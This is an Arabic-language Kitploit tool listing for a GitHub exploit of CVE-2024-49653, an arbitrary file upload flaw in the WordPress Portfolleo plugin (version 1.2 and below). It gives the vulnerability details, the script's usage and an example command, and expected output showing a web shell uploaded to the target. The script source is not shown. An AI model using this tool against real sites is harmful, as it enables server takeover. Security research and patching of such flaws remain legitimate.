Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-49653 — إضافة Portfolleo في WordPress <= 1.2 - ثغرة رفع ملفات تعسفي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-49653
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-49653

CVE-2024-49653

إضافة Portfolleo في WordPress <= 1.2 - ثغرة رفع ملفات تعسفي

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

📜 استغلال إضافة Portfolleo لووردبريس (CVE-2024-49653)

🚨 تفاصيل الثغرة

العنوان: إضافة Portfolleo لووردبريس <= 1.2 - ثغرة رفع ملفات عشوائي

الوصف:
ثغرة رفع ملفات غير مقيد بنوع خطير في إضافة Portfolleo من James Eggers تسمح برفع قشرة ويب إلى خادم الويب. تؤثر هذه المشكلة على Portfolleo من الإصدار n/a حتى 1.2.

للمزيد:

  • CWE-434: CWE-434 رفع ملفات غير مقيد بنوع خطير

درجة CVSS:

  • الدرجة: 9.9
  • الخطورة: حرجة
  • الإصدار: 3.1
  • سلسلة المتجه: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

📋 دليل المستخدم

🚀 استخدام السكربت

يستغل هذا السكربت ثغرة رفع الملفات العشوائي في إضافة Portfolleo لووردبريس (الإصدارات <= 1.2) لرفع قشرة ويب.

📦 المتطلبات

تحتاج إلى تثبيت ما يلي لتشغيل السكربت:

  • Python 3
  • مكتبة requests
  • مكتبة beautifulsoup4

يمكنك تثبيت المكتبات المطلوبة باستخدام:

pip install requests beautifulsoup4

🛠️ الاستخدام

شغّل السكربت مع الخيارات التالية:


CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD

WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of the site (e.g. http://target/wordpress)
  -U, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

📝 مثال

 
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123

📊 المخرجات المتوقعة

إذا نجح السكربت، يجب أن ترى المخرجات التالية:

[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php

⚠️ إخلاء مسؤولية

هذا السكربت مخصص للأغراض التعليمية فقط. لا يقرّ المؤلف استخدام هذا السكربت في أنشطة غير قانونية. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.

بواسطة: Nxploited | Khaled Alenazi

تنزيل الأداة